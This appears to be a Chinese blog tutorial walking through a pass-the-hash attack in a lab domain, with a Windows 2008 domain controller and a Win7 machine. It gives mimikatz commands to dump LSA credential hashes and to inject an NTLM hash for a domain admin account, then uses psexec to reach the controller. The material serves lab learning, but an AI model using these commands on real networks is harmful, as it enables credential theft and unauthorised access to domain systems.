域渗透之pth hash传递攻击

当你拿到了一台服务器的权限,然后使用mimikatz进行读取hash也就是密文,读取到了有admin这个账号,接着把账号和hash注入到内存当中,使用mimikatz把hash传递给另外一台服务器,并且打开一个cmd,说得简单一点就是撞他,赌他们是一样hash和账号的.

下面实验分别是一台08域控和一台win7
我们需要通过win7读取hash,然后去撞域控的hash值.

  1. 导出hash
mimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit >>log2.txt

在这里插入图片描述
在这里插入图片描述
2.以admin账号去撞08服务器的hash值
如果攻击成功回返回一个system32的命令窗口给你.

mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:cyh.com /user:admin /ntlm:afffeba176210fad4628f0524bfe1942" exit

在这里插入图片描述
在这里插入图片描述
3.查看一下域控
使用命令net time
在这里插入图片描述
4.查看一下域控的c盘,看看能不能查看,如果能查看就证明通过hash攻击成功.
在这里插入图片描述
5.接下来你就可以通过psexec.exe进行连接域控的cmd.
在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值